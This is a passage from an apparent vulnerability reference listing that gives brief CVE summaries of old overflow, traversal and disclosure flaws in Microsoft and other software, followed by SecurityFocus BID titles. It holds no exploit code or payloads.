SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Heap Overflow Vulnerability." [CVE-2009-2500] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted WMF image file, aka "GDI+ WMF Integer Overflow Vulnerability." [CVE-2008-3014] Buffer overflow in gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed WMF image file that triggers improper memory allocation, aka "GDI+ WMF Buffer Overrun Vulnerability." [CVE-2007-5348] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via an image file with crafted gradient sizes in gradient fill input, which triggers a heap-based buffer overflow related to GdiPlus.dll and VGX.DLL, aka "GDI+ VML Buffer Overrun Vulnerability." [CVE-2007-1748] Stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to execute arbitrary code via a long zone name containing character constants represented by escape sequences. [CVE-2007-0084] DISPUTED Buffer overflow in the Windows NT Message Compiler (MC) 1.00.5239 on Microsoft Windows XP allows local users to gain privileges via a long MC-filename. NOTE: this issue has been disputed by a reliable third party who states that the compiler is not a privileged program, so privilege boundaries cannot be crossed. [CVE-2007-0043] The Just In Time (JIT) Compiler service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer," probably a buffer overflow, aka ".NET JIT Compiler Vulnerability". [CVE-2007-0041] The PE Loader service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer" and unvalidated message lengths, probably a buffer overflow. [CVE-2006-3869] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060824, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL on a website that uses HTTP 1.1 compression. [CVE-2006-1510] Buffer overflow in calloc.c in the Microsoft Windows XP SP2 ntdll.dll system library, when used by the ILDASM disassembler in the Microsoft .NET 1.0 and 1.1 SDK, might allow user-assisted attackers to execute arbitrary code via a crafted .dll file with a large static method. [CVE-2005-2940] Unquoted Windows search path vulnerability in Microsoft Antispyware 1.0.509 (Beta 1) might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, involving the programs (1) GIANTAntiSpywareMain.exe, (2) gcASNotice.exe, (3) gcasServ.exe, (4) gcasSWUpdater.exe, or (5) GIANTAntiSpywareUpdater.exe. NOTE: it is not clear whether this overlaps CVE-2005-2935. [CVE-2003-0719] Buffer overflow in the Private Communications Transport (PCT) protocol implementation in the Microsoft SSL library, as used in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via PCT 1.0 handshake packets. [CVE-2013-3454] Cisco TelePresence System Software 1.10.1 and earlier on 500, 13X0, 1X00, 30X0, and 3X00 devices, and 6.0.3 and earlier on TX 9X00 devices, has a default password for the pwrecovery account, which makes it easier for remote attackers to modify the configuration or perform arbitrary actions via HTTPS requests, aka Bug ID CSCui43128. [CVE-2013-2558] Unspecified vulnerability in Microsoft Windows 8 allows remote attackers to cause a denial of service (reboot) or possibly have unknown other impact via a crafted TrueType Font (TTF) file, as demonstrated by the 120612-69701-01.dmp error report. [CVE-2013-1450] Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd. [CVE-2013-0899] Integer overflow in the padding implementation in the opus_packet_parse_impl function in src/opus_decoder.c in Opus before 1.0.2, as used in Google Chrome before 25.0.1364.97 on Windows and Linux and before 25.0.1364.99 on Mac OS X and other products, allows remote attackers to cause a denial of service (out-of-bounds read) via a long packet. [CVE-2013-0230] Stack-based buffer overflow in the ExecuteSoapAction function in the SOAPAction handler in the HTTP service in MiniUPnP MiniUPnPd 1.0 allows remote attackers to execute arbitrary code via a long quoted method. [CVE-2013-0001] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 4, and 4.5 does not properly initialize memory arrays, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a pointer to an unmanaged memory location, aka "System Drawing Information Disclosure Vulnerability." [CVE-2012-3884] AirDroid 1.0.4 beta implements authentication through direct transmission of a password hash over HTTP, which makes it easier for remote attackers to obtain access by sniffing the local wireless network and then replaying the authentication data. [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file. [CVE-2012-1537] Heap-based buffer overflow in DirectPlay in DirectX 9.0 through 11.1 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted Office document, aka "DirectPlay Heap Overflow Vulnerability." [CVE-2010-4394] Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.5 allows remote web servers to execute arbitrary code via a long Server header in a response to an HTTP request that occurs during parsing of a RealPix file. [CVE-2010-3000] Multiple integer overflows in the ParseKnownType function in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows allow remote attackers to execute arbitrary code via crafted (1) HX_FLV_META_AMF_TYPE_MIXEDARRAY or (2) HX_FLV_META_AMF_TYPE_ARRAY data in an FLV file. [CVE-2010-2102] Buffer overflow in Webby Webserver 1.01 allows remote attackers to execute arbitrary code via a long HTTP GET request. [CVE-2010-0718] Buffer overflow in Microsoft Windows Media Player 9 and 11.0.5721.5145 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted .mpg file. [CVE-2010-0600] Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 does not properly restrict network access to an unspecified configuration file, which allows remote attackers to read passwords and unspecified other account details via a (1) XML RPC or (2) XML RPC over HTTPS session, aka Bug ID CSCtb83512. [CVE-2010-0597] Unspecified vulnerability in Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 allows remote authenticated users to read or modify the device configuration, and gain privileges or cause a denial of service (device reload), via a (1) XML RPC or (2) XML RPC over HTTPS request, aka Bug ID CSCtb83618. [CVE-2010-0120] Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows allows remote attackers to execute arbitrary code via large size values in QCP audio content. [CVE-2010-0116] Integer overflow in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows might allow remote attackers to execute arbitrary code via a crafted QCP file that triggers a heap-based buffer overflow. [CVE-2009-4413] The httpClientDiscardBody function in client.c in Polipo 0.9.8, 0.9.12, 1.0.4, and possibly other versions, allows remote attackers to cause a denial of service (crash) via a request with a large Content-Length value, which triggers an integer overflow, a signed-to-unsigned conversion error with a negative value, and a segmentation fault. [CVE-2009-2544] Directory traversal vulnerability in the Marcelo Costa FileServer component 1.0 for Microsoft Windows Live Messenger and Messenger Plus! Live (MPL) allows remote authenticated users to list arbitrary directories and read arbitrary files via a .. (dot dot) in a pathname. [CVE-2009-2503] GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability." [CVE-2009-1331] Integer overflow in Microsoft Windows Media Player (WMP) 11.0.5721.5260 allows remote attackers to cause a denial of service (application crash) via a crafted .mid file, as demonstrated by crash.mid. [CVE-2008-5828] Microsoft Windows Live Messenger Client 8.5.1 and earlier, when MSN Protocol Version 15 (MSNP15) is used over a NAT session, allows remote attackers to discover intranet IP addresses and port numbers by reading the (1) IPv4InternalAddrsAndPorts, (2) IPv4Internal-Addrs, and (3) IPv4Internal-Port header fields. [CVE-2008-5745] Integer overflow in quartz.dll in the DirectShow framework in Microsoft Windows Media Player (WMP) 9, 10, and 11, including 11.0.5721.5260, allows remote attackers to cause a denial of service (application crash) via a crafted (1) WAV, (2) SND, or (3) MID file. NOTE: this has been incorrectly reported as a code-execution vulnerability. NOTE: it is not clear whether this issue is related to CVE-2008-4927. [CVE-2008-3623] Heap-based buffer overflow in CoreGraphics in Apple Safari before 3.2 on Windows, in iPhone OS 1.0 through 2.2.1, and in iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted image, related to improper handling of color spaces. [CVE-2008-3015] Integer overflow in gdiplus.dll in GDI+ in Microsoft Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a BMP image file with a malformed BitMapInfoHeader that triggers a buffer overflow, aka "GDI+ BMP Integer Overflow Vulnerability." [CVE-2008-3013] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and subsequent unknown labels, aka "GDI+ GIF Parsing Vulnerability." [CVE-2008-3012] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 does not properly perform memory allocation, which allows remote attackers to execute arbitrary code via a malformed EMF image file, aka "GDI+ EMF Memory Corruption Vulnerability." [CVE-2008-2894] Directory traversal vulnerability in the FTP client in NCH Software Classic FTP 1.02 for Windows allows remote FTP servers to create or overwrite arbitrary files via a .. (dot dot) in a response to a LIST command, a related issue to CVE-2002-1345. [CVE-2008-0768] Multiple stack-based and heap-based buffer overflows in the Windows RPC components for IBM Informix Storage Manager (ISM), as used in Informix Dynamic Server (IDS) 10.00.xC8 and earlier and 11.10.xC2 and earlier, allow attackers to execute arbitrary code via crafted XDR requests. [CVE-2007-6405] Sergey Lyubka Simple HTTPD (shttpd) 1.38 and earlier on Windows allows remote attackers to download arbitrary CGI programs or scripts via a URI with an appended (1) '+' character, (2) '.' character, (3) %2e sequence (hex-encoded dot), or (4) hex-encoded character greater than 0x7f. NOTE: the %20 vector is already covered by CVE-2007-3407. [CVE-2007-6332] The HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier, on Microsoft Windows before Vista allows remote attackers to create or modify arbitrary registry values via the arguments to the SetRegValue method. [CVE-2007-4890] Absolute directory traversal vulnerability in a certain ActiveX control in the VB To VSI Support Library (VBTOVSI.DLL) 1.0.0.0 in Microsoft Visual Studio 6.0 allows remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the SaveAs method. NOTE: contents can be copied from local files via the Load method. [CVE-2007-4790] Stack-based buffer overflow in certain ActiveX controls in (1) FPOLE.OCX 6.0.8450.0 and (2) Foxtlib.ocx, as used in the Microsoft Visual FoxPro 6.0 fpole 1.0 Type Library [CVE-2007-3509] Heap-based buffer overflow in the RPC subsystem in Symantec Backup Exec for Windows Servers 10.0, 10d, and 11d allows remote attackers to cause a denial of service (process exit) and possibly execute arbitrary code via crafted ncacn_ip_tcp requests. [CVE-2007-3111] Buffer overflow in the Provideo Camimage ActiveX control in ISSCamControl.dll 1.0.1.5, when Internet Explorer 6 is used on Windows 2000 SP4, allows remote attackers to execute arbitrary code via a long URL property value. [CVE-2007-3037] Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that causes a size mismatch between compressed and decompressed data and triggers a heap-based buffer overflow, aka "Windows Media Player Code Execution Vulnerability Parsing Skins." [CVE-2007-2903] Buffer overflow in the HelpPopup method in the Microsoft Office 2000 Controllo UA di Microsoft Office ActiveX control (OUACTRL.OCX) 1.0.1.9 allows remote attackers to cause a denial of service (probably winhlp32.exe crash) via a long first argument. NOTE: it is not clear whether this issue crosses privilege boundaries. [CVE-2007-2528] Buffer overflow in AgRpcCln.dll for Trend Micro ServerProtect 5.58 for Windows before Security Patch 3 Build 1176 allows remote attackers to execute arbitrary code via unknown vectors related to RPC requests. NOTE: this is probably a different vulnerability than CVE-2007-2508. [CVE-2007-2400] Race condition in Apple Safari 3 Beta before 3.0.2 on Mac OS X, Windows XP, Windows Vista, and iPhone before 1.0.1, allows remote attackers to bypass the JavaScript security model and modify pages outside of the security domain and conduct cross-site scripting (XSS) attacks via vectors related to page updating and HTTP redirects. [CVE-2007-0064] Heap-based buffer overflow in Windows Media Format Runtime 7.1, 9, 9.5, 9.5 x64 Edition, 11, and Windows Media Services 9.1 for Microsoft Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2007-0042] Interpretation conflict in ASP.NET in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to access configuration files and obtain sensitive information, and possibly bypass security mechanisms that try to constrain the final substring of a string, via %00 characters, related to use of %00 as a string terminator within POSIX functions but a data character within .NET strings, aka "Null Byte Termination Vulnerability." [CVE-2006-6500] Heap-based buffer overflow in Mozilla Firefox 2.x before 2.0.0.1, 1.5.x before 1.5.0.9, Thunderbird before 1.5.0.9, and SeaMonkey before 1.0.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by setting the CSS cursor to certain images that cause an incorrect size calculation when converting to a Windows bitmap. [CVE-2006-6134] Heap-based buffer overflow in the WMCheckURLScheme function in WMVCORE.DLL in Microsoft Windows Media Player (WMP) 10.00.00.4036 on Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long HREF attribute, using an unrecognized protocol, in a REF element in an ASX PlayList file. [CVE-2006-4128] Multiple heap-based buffer overflows in Symantec VERITAS Backup Exec for Netware Server Remote Agent for Windows Server 9.1 and 9.2 (all builds), Backup Exec Continuous Protection Server Remote Agent for Windows Server 10.1 (builds 10.1.325.6301, 10.1.326.1401, 10.1.326.2501, 10.1.326.3301, and 10.1.327.401), and Backup Exec for Windows Server and Remote Agent 9.1 (build 9.1.4691), 10.0 (builds 10.0.5484 and 10.0.5520), and 10.1 (build 10.1.5629) allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted RPC message. [CVE-2006-2587] Buffer overflow in the WebTool HTTP server component in (1) PunkBuster before 1.229, as used by multiple products including (2) America's Army 1.228 and earlier, (3) Battlefield 1942 1.158 and earlier, (4) Battlefield 2 1.184 and earlier, (5) Battlefield Vietnam 1.150 and earlier, (6) Call of Duty 1.173 and earlier, (7) Call of Duty 2 1.108 and earlier, (8) DOOM 3 1.159 and earlier, (9) Enemy Territory 1.167 and earlier, (10) Far Cry 1.150 and earlier, (11) F.E.A.R. 1.093 and earlier, (12) Joint Operations 1.187 and earlier, (13) Quake III Arena 1.150 and earlier, (14) Quake 4 1.181 and earlier, (15) Rainbow Six 3: Raven Shield 1.169 and earlier, (16) Rainbow Six 4: Lockdown 1.093 and earlier, (17) Return to Castle Wolfenstein 1.175 and earlier, and (18) Soldier of Fortune II 1.183 and earlier allows remote attackers to cause a denial of service (application crash) via a long webkey parameter. [CVE-2006-1511] Buffer overflow in the ILASM assembler in the Microsoft .NET 1.0 and 1.1 Framework might allow user-assisted attackers to execute arbitrary code via a .il file that calls a function with a long name. [CVE-2006-0025] Stack-based buffer overflow in Microsoft Windows Media Player 9 and 10 allows remote attackers to execute arbitrary code via a PNG image with a large chunk size. [CVE-2006-0006] Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data. [CVE-2006-0005] Buffer overflow in the plug-in for Microsoft Windows Media Player (WMP) 9 and 10, when used in browsers other than Internet Explorer and set as the default application to handle media files, allows remote attackers to execute arbitrary code via HTML with an EMBED element containing a long src attribute. [CVE-2005-3347] Multiple directory traversal vulnerabilities in index.php in phpSysInfo 2.4 and earlier, as used in phpgroupware 0.9.16 and earlier, and egrouwpware before 1.0.0.009, allow remote attackers to include arbitrary files via .. (dot dot) sequences in the (1) sensor_program parameter or the (2) _SERVER[HTTP_ACCEPT_LANGUAGE] parameter, which overwrites an internal variable, a variant of CVE-2003-0536. NOTE: due to a typo in an advisory, an issue in osh was inadvertently linked to this identifier [CVE-2005-3172] The WideCharToMultiByte function in Microsoft Windows 2000 before Update Rollup 1 for SP4 does not properly convert strings with Japanese composite characters in the last character, which could prevent the string from being null terminated and lead to data corruption or enable buffer overflow attacks. [CVE-2005-3171] Microsoft Windows 2000 before Update Rollup 1 for SP4 records Event ID 1704 to indicate that Group Policy security settings were successfully updated, even when the processing fails such as when Ntuser.pol cannot be accessed, which could cause system administrators to believe that the system is compliant with the specified settings. [CVE-2005-2957] Stack-based buffer overflow in AVIRA Desktop for Windows 1.00.00.68 with AVPACK32.DLL 6.31.0.3, when archive scanning is enabled, allows remote attackers to execute arbitrary code via a long filename in an ACE archive. [CVE-2005-1983] Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm. [CVE-2005-1576] The file download dialog in Mozilla Firefox 0.10.1 and 1.0 for Windows uses the Content-Type HTTP header to determine the file type, but saves the original file extension when "Save to Disk" is selected, which allows remote attackers to hide the real file types of downloaded files. [CVE-2005-1575] The file download dialog in Mozilla Firefox 0.10.1 and 1.0 for Windows allows remote attackers to hide the real file types of downloaded files via the Content-Type HTTP header and a filename containing whitespace, dots, or ASCII byte 160. [CVE-2005-1348] Buffer overflow in HTTPMail in MailEnable Enterprise 1.04 and earlier and Professional 1.54 and earlier allows remote attackers to execute arbitrary code via a long HTTP Authorization header. [CVE-2005-0575] Buffer overflow in Stormy Studios Knet 1.04c and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long HTTP GET request. [CVE-2005-0390] Buffer overflow in the HTTP redirection capability in conn.c for Axel before 1.0b may allow remote attackers to execute arbitrary code. [CVE-2004-2707] Multiple unspecified vulnerabilities in Gyach Enhanced (Gyach-E) before 1.0.5 have unknown impact and attack vectors related to "several security flaws," probably related to buffer overflows in HTTP server responses. [CVE-2004-0386] Buffer overflow in the HTTP parser for MPlayer 1.0pre3 and earlier, 0.90, and 0.91 allows remote attackers to execute arbitrary code via a long Location header. [CVE-2004-0292] Buffer overflow in KarjaSoft Sami HTTP Server 1.0.4 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request. [CVE-2003-1262] Buffer overflow in the http_fetch function of HTTP Fetcher 1.0.0 and 1.0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a URL request via a long (1) host, (2) referer, or (3) userAgent value. [CVE-2003-1165] Buffer overflow in BRS WebWeaver 1.06 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via an HTTP request with a long User-Agent header. [CVE-2003-0807] Buffer overflow in the COM Internet Services and in the RPC over HTTP Proxy components for Microsoft Windows NT Server 4.0, NT 4.0 Terminal Server Edition, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service via a crafted request. [CVE-2003-0409] Buffer overflow in BRS WebWeaver 1.04 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP (1) POST or (2) HEAD request. [CVE-2003-0315] Snowblind Web Server 1.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP request, which may trigger a buffer overflow. [CVE-2002-2149] Buffer overflow in Lucent Access Point 300, 600, and 1500 Service Routers allows remote attackers to cause a denial of service (reboot) via a long HTTP request to the administrative interface. [CVE-2002-2066] BestCrypt BCWipe 1.0.7 and 2.0 through 2.35.1 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-1897] MyWebServer LLC MyWebServer 1.0.2 allows remote attackers to cause a denial of service (crash) via a long HTTP request, possibly triggering a buffer overflow. [CVE-2002-1698] Buffer overflow in Microsoft MSN Messenger Service 1.0 through 4.6 allows remote attackers to cause a denial of service (crash) via a long FN (font) argument in the message header. [CVE-2002-1138] Microsoft SQL Server 7.0 and 2000, including Microsoft Data Engine (MSDE) 1.0 and Microsoft Desktop Engine (MSDE) 2000, writes output files for scheduled jobs under its own privileges instead of the entity that launched it, which allows attackers to overwrite system files, aka "Flaw in Output File Handling for Scheduled Jobs." [CVE-2002-1137] Buffer overflow in the Database Console Command (DBCC) that handles user inputs in Microsoft SQL Server 7.0 and 2000, including Microsoft Data Engine (MSDE) 1.0 and Microsoft Desktop Engine (MSDE) 2000, allows attackers to execute arbitrary code via a long SourceDB argument in a "non-SQL OLEDB data source" such as FoxPro, a variant of CAN-2002-0644. [CVE-2002-1032] Buffer overflow in KeyFocus (KF) web server 1.0.5 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a malformed HTTP header. [CVE-2002-1003] Buffer overflow in MyWebServer 1.02 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request. [CVE-2002-0559] Buffer overflows in PL/SQL module 3.0.9.8.2 in Oracle 9i Application Server 1.0.2.x allow remote attackers to cause a denial of service or execute arbitrary code via (1) a long help page request without a dadname, which overflows the resulting HTTP Location header, (2) a long HTTP request to the plsql module, (3) a long password in the HTTP Authorization, (4) a long Access Descriptor (DAD) password in the addadd form, or (5) a long cache directory name. [CVE-2002-0289] Buffer overflow in Phusion web server 1.0 allows remote attackers to cause a denial of service and execute arbitrary code via a long HTTP request. [CVE-2001-0476] Multiple buffer overflows in s.cgi program in Aspseek search engine 1.03 and earlier allow remote attackers to execute arbitrary commands via (1) a long HTTP query string, or (2) a long tmpl parameter. [CVE-2001-0291] Buffer overflow in post-query sample CGI program allows remote attackers to execute arbitrary commands via an HTTP POST request that contains at least 10001 parameters. [CVE-2001-0285] Buffer overflow in A1 HTTP server 1.0a allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long HTTP request. [CVE-2001-0277] Buffer overflow in ext.dll in BadBlue 1.02.07 Personal Edition allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long HTTP GET request. [CVE-2001-0171] Buffer overflow in SlimServe HTTPd 1.0 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long GET request. [CVE-2000-0775] Buffer overflow in RobTex Viking server earlier than 1.06-370 allows remote attackers to cause a denial of service or execute arbitrary commands via a long HTTP GET request, or long Unless-Modified-Since, If-Range, or If-Modified-Since headers. [CVE-2000-0740] Buffer overflow in strong.exe program in NAI Net Tools PKI server 1.0 before HotFix 3 allows remote attackers to execute arbitrary commands via a long URL in the HTTPS port. [CVE-2000-0643] Buffer overflow in WebActive HTTP Server 1.00 allows remote attackers to cause a denial of service via a long URL. [CVE-2000-0260] Buffer overflow in the dvwssr.dll DLL in Microsoft Visual Interdev 1.0 allows users to cause a denial of service or execute commands, aka the "Link View Server-Side Component" vulnerability. [CVE-1999-1531] Buffer overflow in IBM HomePagePrint 1.0.7 for Windows98J allows a malicious Web site to execute arbitrary code on a viewer's system via a long IMG_SRC HTML tag. SecurityFocus - https://www.securityfocus.com/bid/: [19987] Microsoft Internet Explorer HTTP 1.1 and Compression Long URI Buffer Overflow Variant Vulnerability [19667] Microsoft Internet Explorer HTTP 1.1 and Compression Long URI Buffer Overflow Vulnerability [10123] Microsoft Windows COM Internet Service/RPC Over HTTP Remote Denial Of Service Vulnerability [102474] Rockwell Automation MicroLogix 1400 Controllers CVE-2017-16740 Stack Buffer Overflow Vulnerability [98658] Microsoft Windows Type 1 Fonts Remote Denial of Service Vulnerability [90065] Microsoft Windows Kernel 'Win32k.sys' CVE-2016-0174 Local Privilege Escalation Vulnerability [81973] Multiple MicroLogix 1100 PLC Products CVE-2016-0868 Stack Buffer Overflow Vulnerability [67206] ABB UNITROL 1000 Series Commissioning and Maintenance Tool Arbitrary File Overwrite Vulnerability [43644] Microsoft Excel Lotus 1-2-3 Workbook Parsing Remote Heap Buffer Overflow Vulnerability [42569] Tuniac '.m3u' File Version 100723 Buffer Overflow Vulnerability [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability [33877] BarnOwl Prior to 1.0.5 Multiple Buffer Overflow Vulnerabilities [29110] ZyWALL 100 HTTP Referer Header Cross Site Scripting Vulnerability [14093] Microsoft Update Rollup 1 for Windows 2000 SP4 Released - Multiple Vulnerabilities Fixed [12972] Microsoft Windows Server 2003 Service Pack 1 Released - Multiple Vulnerabilities Fixed [8205] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [1943] Kenny Carruthers Postmaster 1.0 Buffer Overflow Vulnerability [1407] iMesh.Com iMesh 1.02 Buffer Overflow Vulnerability [1363] Network Associates Net Tools PKI Server 1.0 Buffer Overflow Vulnerability [1324] i-drive Filo 1.0.0.1 Buffer Overflow Vulnerability [1285] ITHouse Mail Server 1.04 Buffer Overflow Vulnerability [1227] ArGoSoft FTP Server 1.0 Multiple Buffer Overflow Vulnerabilities [154] Socks5 